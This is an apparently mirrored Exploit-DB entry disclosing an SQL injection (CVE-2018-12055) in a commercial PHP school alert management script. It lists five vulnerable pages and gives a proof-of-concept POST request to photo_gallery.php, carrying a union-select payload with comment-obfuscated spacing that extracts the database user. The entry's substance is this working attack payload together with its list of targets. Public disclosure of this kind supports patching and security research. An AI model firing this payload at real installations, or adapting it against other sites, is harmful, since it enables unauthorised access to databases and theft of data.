Schools Alert Management Script – SQL Injection

• Exploit Database
• 12 阅读

• 作者： M3@Pandas
  日期： 2018-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44866/

• # Exploit Title: Schools Alert Management Script - SQL Injection
  # Date: 2018-06-07
  # Vendor Homepage: https://www.phpscriptsmall.com/
  # Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
  # Category: Web Application
  # Exploit Author: M3@Pandas
  # Web: https://github.com/unh3x/just4cve/issues/2
  # Tested on: Linux Mint
  # CVE: CVE-2018-12055
  
  # Vulnerable cgi:
  contact_us.php faq.php about.php photo_gallery.php privacy.php
  
  # Proof of Concept：
  
  POST http://localhost/[PATH]/photo_gallery.php DATA xxx'/**/union/**/all/**/select/**/1,user(),3,4#